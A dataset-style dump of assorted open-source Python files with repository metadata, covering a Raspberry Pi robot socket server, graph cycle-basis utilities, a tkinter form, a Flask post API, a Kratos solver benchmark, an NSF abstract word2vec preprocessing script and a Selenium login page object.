name='freezeflag',
field=models.BooleanField(default=False),
),
]
| [
"[email protected]"
] | |
10cfe7800595cae7d45d464a2bce17b1b7589fc4 | d45cd48273bef68dabc5c46c3becfafed6dcfe47 | /PiBotRemoteFiles/server.py | 88b0cc25a9e561c8b18ea9bfa00a175936b9e1dd | [] | no_license | robert-swanson/PiBot | ab1313c850f8ec3d30bedc217f5af768dbabdb83 | 775bc098a4d25083c7d2410415ed498fb4e161f8 | refs/heads/master | 2020-03-18T08:17:02.044880 | 2019-10-08T04:15:43 | 2019-10-08T04:15:43 | 134,500,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,065 | py | import socket
import time
import sys
import io
from threading import Thread
try:
import RPi.GPIO as GPIO
except:
print("Not Pi")
# Conection
port = 2000
ping = False
s = None
c = None
# GPIO
PWMA = 7 # Left Speed
AIN1 = 12 # Left Forward
AIN2 = 11 # Left Backward
STBY = 13
BIN1 = 15 # Right Forward
BIN2 = 16 # Right Backward
PWMB = 18 # Right Speed
SERVO = 22
connected = 37
replaying = 38
data = 40
lPWM = None
rPWM = None
sPWM = None
history = []
timer = 0
stop = False
lastServoCommand = 0
servoWaiting = False
def isNum(s):
try:
float(s)
return True
except ValueError:
return False
def main():
global port
if len(sys.argv) > 1:
port = int(sys.argv[1])
global PWMA, AIN1, AIN2, STBY, BIN1, BIN2, PWMB,SERVO, connected, replaying, data
for i in range(2,len(sys.argv)):
val = sys.argv[i]
if(i==2):
PWMA = int(val)
print("PWMA = "+val)
elif(i==3):
AIN1 = int(val)
elif(i==4):
AIN2 = int(val)
elif(i==5):
STBY = int(val)
elif(i==6):
BIN1 = int(val)
elif(i==7):
BIN2 = int(val)
elif(i==8):
PWMB = int(val)
elif(i==9):
SERVO = int(val)
elif(i==10):
connected = int(val)
elif(i==11):
replaying = int(val)
elif(i==12):
data = int(val)
print("data = "+val)
try:
netLoop()
except Exception as e:
print("ERROR: " + str(e))
time.sleep(1)
global s
if s != None:
s.close()
finally:
print("Closing Client")
def netLoop():
s = socket.socket()
s.bind(('',port))
on(data)
print(PWMA)
print(AIN1)
print(AIN2)
print(BIN1)
print(BIN2)
print(PWMB)
print(STBY)
print(replaying)
print(connected)
print(data)
print("Listening on port " + str(port) + "...")
s.listen(5)
global c
c, addr = s.accept()
on(connected)
off(data)
print(str(addr))
while True:
input = c.recv(1024).strip()[:-1]
comms = input.split("$")
for i in range(len(comms)):
comm = comms[i]
if((not isNum(comm) and not (len(comm.split(" ")) > 1) or (i == len(comms)-1)) and interpret(comm)):
return
def interpret(input):
# print("Interpreting: "+input)
on(data)
if input == b'':
return True
elif input == b'close':
c.send("ping")
print("Closed by server")
return True
elif input == b'ping':
if ping:
print("Ping Successful")
else:
print("Ping")
c.send("ping")
elif input == b'forward':
print("starting replay")
Thread(target=playForward).start()
elif input == b'backward':
print("starting rewind")
Thread(target=playBackward).start()
elif input == b'clear':
global history
history = []
print("cleared")
elif input == b'stop':
global stop
stop = True
updateGPIO(0,0)
print("stop")
else:
try:
nums = input.split(" ")
if(len(nums) >= 2):
l = float(nums[0])
r = float(nums[1])
updateGPIO(l,r)
addEventToHistory(l,r)
elif(len(nums)==1 and SERVO > 0): #Servo
global sPWM
global lastServoCommand
global servoWaiting
sPWM.start(2.5)
lastServoCommand = time.time()
if not servoWaiting:
sPWM = GPIO.PWM(SERVO,50)
sPWM.start(float(nums[0]))
Thread(target=servoWait).start()
else:
sPWM.ChangeDutyCycle(float(nums[0]))
except Exception as e:
print(e)
print("Unkown Message: " + input)
pass
off(data)
def servoWait():
global servoWaiting
global lastServoCommand
servoWaiting = True
blink = False
while time.time()-lastServoCommand <= .1:
time.sleep(.1)
sPWM.stop()
servoWaiting = False
def addEventToHistory(l,r):
global timer
history.append([l,r])
if timer != 0:
dur = time.time() - timer
history[len(history)-2].append(dur)
timer = time.time()
def playForward():
print history
global stop
on(replaying)
stop = False
global timer
for event in history:
if stop:
break
if event[0] != 0 and event[1] != 0:
updateGPIO(event[0],event[1])
if len(event) >= 2:
time.sleep(event[2])
else:
updateGPIO(0,0)
updateGPIO(0,0)
stop = False
off(replaying)
c.send("done")
print("done replay")
def playBackward():
global stop
on(replaying)
stop = False
global timer
for i in range(len(history)):
index = len(history)-1-i
event = history[index]
if stop:
break
if event[0] != 0 and event[1] != 0:
updateGPIO(-event[0],-event[1])
if len(event) >= 2:
time.sleep(event[2])
else:
updateGPIO(0,0)
updateGPIO(0,0)
stop = False
off(replaying)
c.send("done")
print("done rewind")
# GPIO --------------------------------------------
def setout(pin):
if(pin > 0 and pin <= 40):
GPIO.setup(pin,GPIO.OUT)
else:
print("ignoring pin")
def setupGPIO():
GPIO.setmode(GPIO.BOARD)
setout(PWMA)
setout(AIN1)
setout(AIN2)
setout(STBY)
setout(BIN1)
setout(BIN2)
setout(PWMB)
setout(connected)
setout(replaying)
setout(data)
setout(SERVO)
GPIO.output(STBY,True)
global lPWM
global rPWM
global sPWM
lPWM = GPIO.PWM(PWMA, 100)
rPWM = GPIO.PWM(PWMB, 100)
if(SERVO > 0):
sPWM = GPIO.PWM(SERVO, 50)
lPWM.start(0)
rPWM.start(0)
def updateGPIO(lS, rS):
lS *= 100
rS *= 100
if lS > 100: lS = 100
if lS < -100: lS = -100
if rS > 100: rS = 100
if rS < -100: rS = -100
lPWM.ChangeDutyCycle(abs(lS))
rPWM.ChangeDutyCycle(abs(rS))
GPIO.output(AIN1,lS>=0)
GPIO.output(AIN2,lS<0)
GPIO.output(BIN1,rS>=0)
GPIO.output(BIN2,rS<0)
def on(pin):
if((pin > 0) and (pin <= 40)):
GPIO.output(pin, True)
else:
print("Invalid Pin: " + pin)
def off(pin):
if((pin > 0) and (pin <= 40)):
GPIO.output(pin, False)
else:
print("Invalid Pin: " + pin)
# -------------------------------------------------
print("Just so that at least something is printed")
try:
try:
setupGPIO()
except: pass
main()
finally:
try:
off(connected)
off(data)
GPIO.cleanup()
except: pass
| [
"[email protected]"
] | |
dadbd938b2cbd707de7f77ea6959a52b24f60efd | 2cdcda6a22d8f540f6152583391e13b5a0e49fab | /controller/create.py | 99c8aa9cc6d1e67329b8b991e1c8fdbd67d74c99 | [] | no_license | Faylixe/remix-factory | f17dd5a043b67e6f2b2d1cd01df74aede772c270 | 6b4a475aa597d1e081b34f9c3457c90f1410ea4b | refs/heads/master | 2021-01-20T15:59:36.349837 | 2016-06-03T08:53:23 | 2016-06-03T08:53:23 | 58,656,446 | 9 | 1 | null | null | null | null | UTF-8 | Python | false | false | 929 | py |
#!/usr/bin/python
import time
from shutil import copyfile
from controller import Controller
class NeuronFactory(Controller):
"""A NeuronTrainer is in charge of training a given neuron.
It uses a source neuron as a template for all other neurons to be created,
and copy this source neuron each time the __call__ method is used.
"""
def __init__(self, source, size):
"""Default constructor.
:param source: Path of the source file the neuron will be created from.
:param size: Number of neuron to be created through this controller.
"""
Controller.__init__(self, size, "Creating neurons")
self.source = source
def __call__(self, neuron):
"""Creates empty model as compressed file for the given neuron.
:param neuron: Neuron to create file for.
"""
copyfile(self.source, neuron.getCompressedFile())
self.next()
| [
"[email protected]"
] | |
99c0f4291f705d20be4f080691bf7e32fef35a65 | b96bc06efe67d89d909f758f22cbdca46bde17f1 | /defect/graph/cyclebasis/pub.py | 653331bc06882337d3be76fcd31152f8dd32e689 | [] | no_license | ExpHP/defect | ecf9f5c8d36384faa90495e9ee63ad4bc2939fe9 | 4541365861002f3d927aff44f34c38fddee13ca7 | refs/heads/master | 2021-06-15T04:59:42.781209 | 2021-02-03T02:29:04 | 2021-02-03T02:29:04 | 34,793,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,309 | py |
# cyclebasis/pub.py -- public functions to be exported from defect.graph.cyclebasis
# (nothing interesting here; just delegates to implementations located elsewhere).
from . import _planar
from defect.graph.cyclebasis.builder import CycleBasisBuilder
import defect.filetypes.internal as fileio
import networkx as nx
from defect.util import unzip_dict
def planar(g, pos):
'''
Construct cyclebasis from planar embedding.
May be invoked in the following ways:
* ``planar(g, pos)``, where ``pos`` is a dict of ``{node: (x,y)}``
describing a planar embedding of the nodes in ``g``.
* ``planar.from_gpos(g, path)``, where ``path`` is a filepath to
a ``.planar.gpos`` file that provides an embedding for ``g``.
'''
xs,ys = unzip_dict(pos)
return _planar.planar_cycle_basis_nx(g, xs, ys)
# attach secondary method of invocation
def _from_gpos(g, path):
pos = fileio.gpos.read_gpos(path)
return planar(g, pos)
planar.from_gpos = _from_gpos
def from_file(path):
'''
Read a cyclebasis from a .cycles file.
This always puts the cycles into the format expected by the
defect trial (in contrast to ``defect.filetypes.internal.cycles.read_cycles``
which has extraneous options)
'''
# TODO we should validate the cyclebasis against g here
# (I thought I had a method which did this, but can't find it...)
return fileio.cycles.read_cycles(path, repeatfirst=True)
def last_resort(g):
'''
Produce a (low-quality) cyclebasis using a fast and reliable method.
This should be avoided for graphs of any decent size, as it tends
to produce cyclebases which have a lot of overlap, leading to a
dense resistance matrix. (if you have a dense resistance matrix,
you're gonna have a bad time)
'''
cycles = list(nx.cycle_basis(g))
for c in cycles:
c.append(c[0]) # make loop
return cycles
#-----------------------------------------------------------
# cbupdaters, which are provided to CurrentMeshSolver so it can... update the cbs.
class planar_cbupdater:
'''
Allows one to update a cyclebasis in response to changes in the graph.
Do not use this one.
'''
def init(self, cycles):
self.cycles = cycles
def remove_vertex(self, g, v):
self.cycles = _planar.without_vertex(self.cycles, v)
def get_cyclebasis(self):
return self.cycles
class builder_cbupdater:
'''
Allows one to update a cyclebasis in response to changes in the graph.
This one keeps track of basis elements and linear dependencies by
building and maintaining a bit matrix in REF form.
'''
def init(self, cycles):
self.builder = CycleBasisBuilder.from_basis_cycles(cycles)
def remove_vertex(self, g, v):
self.builder.remove_vertex(v)
def get_cyclebasis(self):
return self.builder.cycles
class dummy_cbupdater:
'''
Does NOT allow one to update a cyclebasis in response to changes in the graph,
and instead throws exceptions if you try to do anything remotely change-y.
This exists because ``CurrentMeshSolver`` always expects a ``cbupdater`` even
if it does not modify the graph. With a ``dummy_cbupdater``, it is possible
to use ``CurrentMeshSolver`` to compute currents only for the initial state.
'''
def init(self, cycles):
self.cycles = cycles
def remove_vertex(self, g, v):
raise NotImplementedError("dummy_cbupdater")
def get_cyclebasis(self):
return self.cycles
| [
"[email protected]"
] | |
d0f4a4d3c6e36cf9f46459e8e32757ab3bffd737 | d088652daa2cdbacf66884e5c62dd0e09326e8d3 | /Week 3 Labs/Week3 Activity10.py | 9284631f9b0f667d2a176d23aeaba7eafe26bc1c | [] | no_license | redyelruc/AdvProgModule | beac4e0e60253f6f039fd03a08ad2e520e1a007a | fdb7ac492ce464ace6286ca94448bd37172f4203 | refs/heads/master | 2023-02-04T15:14:12.125839 | 2020-12-18T12:07:00 | 2020-12-18T12:07:00 | 310,256,254 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,885 | py | from tkinter import ttk
import tkinter.scrolledtext as tkscrolled
import tkinter as tk
def open_main_window(title, x, y):
# set up main window
root = tk.Tk()
root.title(title)
root.geometry(f"{x}x{y}")
return root
def make_grid_rows_and_columns(window, rows, columns):
for i in range(rows):
window.grid_rowconfigure(i, weight=1, uniform="group1")
for i in range(columns):
window.grid_columnconfigure(i, weight=1, uniform="group1")
def add_labels_to_main_window(window, labels):
r = 1
for l in labels:
tk.Label(window, text=l, anchor='w', padx=10, font=("Helvetica", 14))\
.grid(row=r, column=0, columnspan=2, sticky="nw")
r = r + 2
def add_text_entry_box(window, row, column, text):
entry = tk.Entry(window, font=("Helvetica", 14))
entry.grid(row=row, column=column, columnspan=3, sticky="nw")
entry.insert(tk.END, text)
def add_button(window, row, column, name):
b = tk.Button(window, text=name, borderwidth=3, font=("Helvetica", 14), relief=tk.RAISED)
b.grid(row=row, column=column, rowspan=2, columnspan=3, ipady=5, ipadx=5, pady=(15, 15), padx=(25, 25))
def add_combobox(window, row, column, values):
combo = ttk.Combobox(window, font=("Helvetica", 14))
combo.grid(row=row, column=column, columnspan=3, sticky="nw")
combo.set("ComboBox")
combo['values'] = values
def add_scrolled_textbox(window, row, column, text):
bio = tkscrolled.ScrolledText(window, wrap=tk.WORD, font=("Helvetica", 14))
bio.grid(row=row, column=column, padx=10, pady=5, rowspan=1, columnspan=9, sticky="nw")
bio.insert(tk.INSERT, text)
def add_frame_with_radio_buttons(window, options):
frame1 = tk.Frame(window, bg="light gray", relief='sunken')
frame1.grid(row=1, column=6, rowspan=3, columnspan=3, padx=(10, 10), sticky="nwe")
mod = tk.StringVar()
mod.set("Currently Employed") # initialize
r = 0
for option in options:
b = tk.Radiobutton(frame1, text=option, bg="light gray", variable=mod, value=option)
b.grid(row=r, column=1, sticky="nw")
r += 1
def add_frame_with_checkboxes(window, options):
frame2 = tk.Frame(window, bg="light gray", relief='sunken')
frame2.grid(row=5, column=6, rowspan=3, columnspan=3, padx=(10, 10), sticky="nwe")
r = 0
for option in options:
b = tk.Checkbutton(frame2, text=option, bg="light gray")
b.grid(row=r, column=1, sticky="nw")
r += 1
def main():
# draw main window
root = open_main_window("Register Personal Details", 650, 500)
make_grid_rows_and_columns(root, 15, 10)
#add labels and text entry box
labels = ['Name:', 'Profession:', 'Position:', 'Biography:']
add_labels_to_main_window(root,labels)
add_text_entry_box(root, 1, 2, "Name")
# add combo boxes
jobs = ["Accountant", "Architect", "Doctor", "Engineer", "Teacher"]
positions = ["Officer", "Assistant Manager", "Manager", "Managing Director", "CEO"]
add_combobox(root, 3, 2, jobs)
add_combobox(root, 5, 2, positions)
text = "Secrevit fontes liquidum locoque pronaque?\nIllas semine " \
"campoque declivia oppida corpora nam inter fuit discordia " \
"tellus solidumque iunctarum erat: quae terrenae ubi rerum recessit iudicis aestu fixo"
add_scrolled_textbox(root, 8, 0, text)
# add frames to the right hand side
buttons = ["Currently Employed", "Self Employed", "Unemployed", "Other"]
add_frame_with_radio_buttons(root, buttons)
checkboxes = ["Student (Part/Full-time)", "Home Owner", "Transport Owner"]
add_frame_with_checkboxes(root, checkboxes)
# add buttons at bottom
add_button(root, 13, 0, 'Clear')
add_button(root, 13, 7, 'Submit')
add_button(root, 13, 5, 'Cancel')
# launch the GUI
root.mainloop()
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
1cd6060ec53429c1f851fd3349cf3951c197cc77 | aeee61b6532965f03a6c9b0a1c50e8e0b5919cb2 | /andrewtomai/api/post_api.py | 9a3a457356f346846ba1cd5666b6927abaaaf529 | [] | no_license | andrewtomai/super-website | 50516258e505d7705f8a0e2a69341cec2f8a5ff8 | 87c2c8dded350d06f1125ac2dad2bb09afcb4761 | refs/heads/master | 2021-05-07T20:41:00.306789 | 2017-12-17T18:12:43 | 2017-12-17T18:12:43 | 108,932,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,593 | py | """
REST API for all posts.
URLs include:
/api/p/
/api/p/<postId>
"""
from andrewtomai.api.upload_helper import upload_file
import andrewtomai
import flask
@andrewtomai.app.route('/api/p/', methods=['GET', 'POST'])
def list_posts():
"""List all the most recent posts."""
if flask.request.method == 'GET':
# if this is a GET request, the user need not be logged in
size = flask.request.args.get('size', default=5, type=int)
page = flask.request.args.get('page', default=0, type=int)
# error check this request
if size < 0 or page < 0:
return flask.jsonify({
"message": "Bad Request",
"status_code": 400}), 400
return flask.jsonify(get_posts(size, page))
else:
# if this is a POST request, the user must be logged in as a root user!
# FIXME remove this next line when not testing
# flask.session['logname'] = 'atomai'
if 'logname' not in flask.session:
return flask.jsonify({
"message": "Unauthorized",
"status_code": 401}), 401
return submit_post()
@andrewtomai.app.route('/api/p/<int:postid>/', methods=['GET'])
def individual_post(postid):
"""Get an individual post."""
database = andrewtomai.model.get_db()
# get the specific post
cursor = database.execute(
"SELECT * "
"FROM posts "
"WHERE postid = ?;", str(postid)
)
post = cursor.fetchone()
if post is None:
return flask.jsonify({"message": "Not Found", "status_code": 404}), 404
context = {
'age': post['created'],
'banner_url': flask.url_for(
'.uploaded_file',
filename=post['banner']
),
'text': post['text']
}
return flask.jsonify(context)
def submit_post():
"""Submit a post to the website."""
database = andrewtomai.model.get_db()
cursor = database.execute(
"SELECT usertype FROM users "
"WHERE username = ?",
(flask.session['logname'],)
)
usertype = cursor.fetchone()['usertype']
if usertype is not 0:
return flask.jsonify({
"message": "Forbidden",
"status_code": 403}), 403
banner_name = upload_file()
cursor = database.execute(
"INSERT INTO posts ("
"banner, text, created) "
"VALUES (?, ?, CURRENT_TIMESTAMP)",
(banner_name, flask.request.form['post_text'])
)
database.commit()
return flask.jsonify({'status': 'success'})
def get_posts(size, page):
"""Get most recent posts."""
database = andrewtomai.model.get_db()
cursor = database.execute(
"SELECT postid FROM posts "
"ORDER BY postid DESC "
"LIMIT ? "
"OFFSET ?;",
(size, size * page)
)
posts_list = cursor.fetchall()
posts = {}
posts['results'] = []
for post in posts_list:
posts['results'].append({'url': flask.url_for(
'.individual_post',
postid=post['postid']
)})
# get the number of total posts for the 'next' parameter
cursor = database.execute(
"SELECT COUNT(*) FROM posts"
)
total_posts = cursor.fetchone()['COUNT(*)']
if total_posts > (size * page) + size:
# there is a next page
parameters = "?size=" + str(size) + "&page=" + str(page + 1)
posts['next'] = flask.url_for('.list_posts') + parameters
else:
# there is no next page of posts
posts['next'] = ''
posts['url'] = flask.url_for('.list_posts')
return posts
| [
"[email protected]"
] | |
146f9ccf026d8c0817580d91e077a72f246b7d52 | b54b6168ba35ce6ad34f5a26b5a4a3ab8afa124a | /kratos_3_0_0/applications/structural_application/test_examples/cantilever3d.gid/cantilever3dstatic_superlu_benchmarking.py | 728d0617a9bab45f572057ea8066cb7e7d3b02c9 | [] | no_license | svn2github/kratos | e2f3673db1d176896929b6e841c611932d6b9b63 | 96aa8004f145fff5ca6c521595cddf6585f9eccb | refs/heads/master | 2020-04-04T03:56:50.018938 | 2017-02-12T20:34:24 | 2017-02-12T20:34:24 | 54,662,269 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,795 | py | def FindNode(node_list,x,y,z):
for node in node_list:
if ((node.X - x) ** 2 + (node.Y - y) ** 2 + (node.Z - z) ** 2 < 0.0000001):
print node
return node
def BenchmarkCheck(time, node1, node2, node3, node4):
benchmarking.Output(time, "Time")
benchmarking.Output(node1.GetSolutionStepValue(DISPLACEMENT_X), "Node 1 Displacement_x", 0.00001)
benchmarking.Output(node1.GetSolutionStepValue(DISPLACEMENT_Y), "Node 1 Displacement_y", 0.00001)
benchmarking.Output(node1.GetSolutionStepValue(DISPLACEMENT_Z), "Node 1 Displacement_z", 0.00001)
benchmarking.Output(node2.GetSolutionStepValue(DISPLACEMENT_X), "Node 2 Displacement_x", 0.00001)
benchmarking.Output(node2.GetSolutionStepValue(DISPLACEMENT_Y), "Node 2 Displacement_y", 0.00001)
benchmarking.Output(node2.GetSolutionStepValue(DISPLACEMENT_Z), "Node 2 Displacement_z", 0.00001)
benchmarking.Output(node3.GetSolutionStepValue(REACTION_X), "Node 3 Reaction_x", 0.00001)
benchmarking.Output(node3.GetSolutionStepValue(REACTION_Y), "Node 3 Reaction_y", 0.00001)
benchmarking.Output(node3.GetSolutionStepValue(REACTION_Z), "Node 3 Reaction_z", 0.00001)
benchmarking.Output(node4.GetSolutionStepValue(REACTION_X), "Node 4 Reaction_x", 0.00001)
benchmarking.Output(node4.GetSolutionStepValue(REACTION_Y), "Node 4 Reaction_y", 0.00001)
benchmarking.Output(node4.GetSolutionStepValue(REACTION_Z), "Node 4 Reaction_z", 0.00001)
#def AnalyticalResults(time, node1, node2,node3, node4):
#benchmarking.Output(time, "Time")
#benchmarking.Output(-0.221921365586, "Node 1 Displacement_x", 0.00001)
#benchmarking.Output(-0.0361068223759, "Node 2 Displacement_y", 0.00001)
#benchmarking.Output( 51.6844785228, "Node 3 Reaction_x", 0.00001)
#benchmarking.Output( -123.134969306, "Node 4 Reaction_y", 0.00001)
##################################################################
##################################################################
import sys
kratos_benchmarking_path = '../../../../benchmarking' ##kratos_root/benchmarking
sys.path.append(kratos_benchmarking_path)
import benchmarking
#import the configuration data as read from the GiD
import Kratos_Structural_Application_var
##find neighbours if required
def FindNeighbours():
if(Kratos_Structural_Application_var.FindNodalNeighbours == "True"):
number_of_avg_elems = 10
number_of_avg_nodes = 10
nodal_neighbour_search = FindNodalNeighboursProcess(model_part,number_of_avg_elems,number_of_avg_nodes)
nodal_neighbour_search.Execute()
if(Kratos_Structural_Application_var.FindElementalNeighbours == "True"):
neighbour_calculator = FindElementalNeighboursProcess(model_part,2,10);
neighbour_calculator.Execute()
##importing the rotational dofs degrees of freedom if necessary
def RotationalDofs():
if(Kratos_Structural_Application_var.Rotational_Dofs == "True"):
for node in model_part.Nodes:
node.AddDof(ROTATION_X)
node.AddDof(ROTATION_Y)
node.AddDof(ROTATION_Z)
##################################################################
##################################################################
from time import *
print ctime()
t0 = clock()
#including kratos path
from KratosMultiphysics import *
from KratosMultiphysics.StructuralApplication import *
from KratosMultiphysics.ExternalSolversApplication import *
#setting the domain size for the problem to be solved
domain_size = Kratos_Structural_Application_var.domain_size
#defining a model part
model_part = ModelPart("StructurePart");
model_part.AddNodalSolutionStepVariable(FORCE);
if(Kratos_Structural_Application_var.Rotational_Dofs == "True"):
model_part.AddNodalSolutionStepVariable(ROTATION);
import structural_solver_static as SolverType
SolverType.AddVariables(model_part)
#reading a model
name = Kratos_Structural_Application_var.problem_name
gid_mode = GiDPostMode.GiD_PostBinary
multifile = MultiFileFlag.MultipleFiles
deformed_mesh_flag = WriteDeformedMeshFlag.WriteUndeformed
write_conditions = WriteConditionsFlag.WriteElementsOnly
gid_io = GidIO(name,gid_mode,multifile,deformed_mesh_flag, write_conditions)
model_part_io = ModelPartIO(name)
model_part_io.ReadModelPart(model_part)
mesh_name = 0.0
gid_io.InitializeMesh( mesh_name );
gid_io.WriteMesh((model_part).GetMesh());
gid_io.FinalizeMesh()
##find neighbours if required
FindNeighbours();
model_part.Properties[1].SetValue(CONSTITUTIVE_LAW, Isotropic3D())
print "Linear elastic model selected"
print model_part
print model_part.Properties
#the buffer size should be set up here after the mesh is read for the first time
model_part.SetBufferSize(3)
##importing the rotational dofs degrees of freedom if necessary
RotationalDofs()
#importing the solver files
SolverType.AddDofs(model_part)
solver = SolverType.StaticStructuralSolver(model_part,domain_size)
solver.structure_linear_solver = SuperLUSolver()
CT = Kratos_Structural_Application_var.Convergence_Tolerance;
AT = Kratos_Structural_Application_var.Absolute_Tolerance;
if(Kratos_Structural_Application_var.Convergence_Criteria == "Displacement_Criteria"):
solver.conv_criteria = DisplacementCriteria(CT,AT)
elif(Kratos_Structural_Application_var.Convergence_Criteria == "Residual_Criteria"):
solver.conv_criteria = ResidualCriteria(CT,AT)
elif(Kratos_Structural_Application_var.Convergence_Criteria == "And_Criteria"):
Displacement = DisplacementCriteria(CT,AT)
Residual = ResidualCriteria(CT,AT)
solver.conv_criteria = AndCriteria(Residual, Displacement)
elif(Kratos_Structural_Application_var.Convergence_Criteria == "Or_Criteria"):
Displacement = DisplacementCriteria(CT,AT)
Residual = ResidualCriteria(CT,AT)
solver.conv_criteria = OrCriteria(Residual, Displacement)
node_1 = model_part.Nodes[3]
node_2 = model_part.Nodes[6]
node_3 = model_part.Nodes[1]
node_4 = model_part.Nodes[2]
solver.Initialize()
(solver).SetEchoLevel(2);
Dt = 0.001
nsteps =5
print("initializing results")
gid_io.InitializeResults(mesh_name,(model_part).GetMesh())
for step in range(0,nsteps):
time = Dt*step
model_part.CloneTimeStep(time)
#print model_part.ProcessInfo()[TIME]
#solving the fluid problem
if(step > 3):
solver.Solve()
if (benchmarking.InBuildReferenceMode()):
#AnalyticalResults(time, node_1, node_2, node_3, node_4)
BenchmarkCheck(time, node_1, node_2, node_3, node_4)
else:
BenchmarkCheck(time, node_1, node_2, node_3, node_4)
#print the results
gid_io.WriteNodalResults(DISPLACEMENT,model_part.Nodes,time,0)
gid_io.WriteNodalResults(REACTION,model_part.Nodes,time,0)
gid_io.FinalizeResults()
print "Completed Analysis"
| [
"pooyan@4358b7d9-91ec-4505-bf62-c3060f61107a"
] | pooyan@4358b7d9-91ec-4505-bf62-c3060f61107a |
8554c7b4aa1726196474b9654b35e9aa4b761cb6 | dea374ac0c61caae2b87a0fd1ad104db8199a53b | /process_data.py | 425a11161c61419a80b69951af74d34e7b688fa2 | [] | no_license | xiaoguan002/NSF | 22914fe5e685856df97be6ce0c04b67d3f689647 | b278c3874993033db16e51ad811e99f06edec1a9 | refs/heads/master | 2021-01-10T01:19:23.843642 | 2017-03-01T03:52:21 | 2017-03-01T03:52:21 | 54,110,576 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,187 | py | import numpy as np
import cPickle
from collections import defaultdict
import sys, re
import pandas as pd
import MySQLdb
import string
def build_data_cv(cv=10, clean_string=True):
"""
Loads data and split into 10 folds.
"""
try:
conn=MySQLdb.connect('private')
cur=conn.cursor()
cur.execute('select AbstractNarration, OrganizationDivisionLongName from nsfmain')
results_code=cur.fetchall()
cur.close()
conn.close()
except MySQLdb.Error,e:
print "Mysql Error %d: %s" % (e.args[0], e.args[1])
revs = []
vocab = defaultdict(float)
for r in results_code:
div = 0
if r[1] == 'Division of Computer and Network Systems' or r[1] == 'Division Of Computer and Network Systems':
div = 0
elif r[1] =='Div Of Information & Intelligent Systems' or r[1] =='Division of Information & Intelligent Systems':
div = 1
elif r[1] =='Division of Computing and Communication Foundations' or r[1] =='Division of Computer and Communication Foundations'or \
r[1]== 'Div Of Computer & Communication Foundati':
div = 2
elif r[1] =='Division of Advanced CyberInfrastructure' or r[1] =='Div Of Advanced Cyberinfrastructure':
div = 3
else :
continue
rev = []
if r[0] == '':
continue
rev.append(r[0].strip())
orig_rev = text_to_word_sequence(" ".join(rev))
if len(orig_rev) < 20:
continue
words = set(orig_rev)
for word in words:
vocab[word] += 1
datum = {"y":div,
"text": orig_rev,
"num_words": len(orig_rev),
"split": np.random.randint(0,cv)}
#if datum['num_words'] > 400:
# continue
revs.append(datum)
# for i in range(1):
# print revs
return revs, vocab
def base_filter():
f = string.punctuation
f = f.replace("'", '')
f += '\t\n'
return f
def text_to_word_sequence(text, filters=base_filter(), lower=True, split=" "):
'''prune: sequence of characters to filter out
'''
if lower:
text = text.lower()
text = text.translate(string.maketrans(filters, split*len(filters)))
seq = text.split(split)
return [_f for _f in seq if _f]
def get_W(word_vecs, k=300):
"""
Get word matrix. W[i] is the vector for word indexed by i
"""
vocab_size = len(word_vecs)
word_idx_map = dict()
W = np.zeros(shape=(vocab_size+1, k), dtype='float32')
W[0] = np.zeros(k, dtype='float32')
i = 1
for word in word_vecs:
W[i] = word_vecs[word]
word_idx_map[word] = i
i += 1
return W, word_idx_map
def load_bin_vec(fname, vocab):
"""
Loads 300x1 word vecs from Google (Mikolov) word2vec
"""
word_vecs = {}
with open(fname, "rb") as f:
header = f.readline()
vocab_size, layer1_size = map(int, header.split())
binary_len = np.dtype('float32').itemsize * layer1_size
print " Vocab_size:", vocab_size
print " Vocab_dimension:", layer1_size
for line in xrange(vocab_size):
word = []
while True:
ch = f.read(1)
if ch == ' ':
word = ''.join(word)
break
if ch != '\n':
word.append(ch)
if word in vocab:
word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32')
else:
f.read(binary_len)
return word_vecs
def add_unknown_words(word_vecs, vocab, min_df=1, k=300):
"""
For words that occur in at least min_df documents, create a separate word vector.
0.25 is chosen so the unknown vectors have (approximately) same variance as pre-trained ones
"""
for word in vocab:
if word not in word_vecs and vocab[word] >= min_df:
word_vecs[word] = np.random.uniform(-0.25,0.25,k)
if __name__=="__main__":
w2v_file = 'F:/GoogleNews-vectors-negative300.bin'
print "loading data...",
revs, vocab = build_data_cv(cv=10, clean_string=True)
max_l = np.max(pd.DataFrame(revs)["num_words"])
min_l = np.min(pd.DataFrame(revs)["num_words"])
mean_l = np.mean(pd.DataFrame(revs)["num_words"])
'''
for i in range(4):
print revs[i]
exit()
'''
print "data loaded!"
print "number of sentences: " + str(len(revs))
print "vocab size: " + str(len(vocab))
print "max sentence length: " + str(max_l)
print "min sentence length: " + str(min_l)
print "mean sentence length: " + str(mean_l)
print "loading word2vec vectors...",
w2v = load_bin_vec(w2v_file, vocab)
print "word2vec loaded!"
print "num words already in word2vec: " + str(len(w2v))
add_unknown_words(w2v, vocab)
W, word_idx_map = get_W(w2v)
rand_vecs = {}
add_unknown_words(rand_vecs, vocab)
W2, _ = get_W(rand_vecs)
cPickle.dump([revs, W, W2, word_idx_map, vocab, max_l], open("mr.p", "wb"))
print "dataset created!"
| [
"[email protected]"
] | |
b9375991b0bfe68afce4ccdcaef1bfeda77efd0d | 4e7c8a741b50a6c9b3717e7a22daea8a90e42fb3 | /pages/loginPage.py | d56f678fee2c749a6eeff34e6e38262adc5f6826 | [] | no_license | matthiassack/AutomationFramework | 53650bf3ae071f37885b38fe6bd804be9d0e8949 | 32781437447ca9008a4ffd2c49ce1e02478e9290 | refs/heads/master | 2020-04-03T03:22:27.550688 | 2019-07-17T19:12:39 | 2019-07-17T19:12:39 | 154,983,979 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 520 | py | class LoginPage:
def __init__(self, driver):
self.driver = driver
def enter_username(self, username):
self.driver.find_element_by_id("txtUsername").clear()
self.driver.find_element_by_id("txtUsername").send_keys(username)
def enter_password(self, password):
self.driver.find_element_by_id("txtPassword").clear()
self.driver.find_element_by_id("txtPassword").send_keys(password)
def click_login(self):
self.driver.find_element_by_id("btnLogin").click()
| [
"[email protected]"
] | |
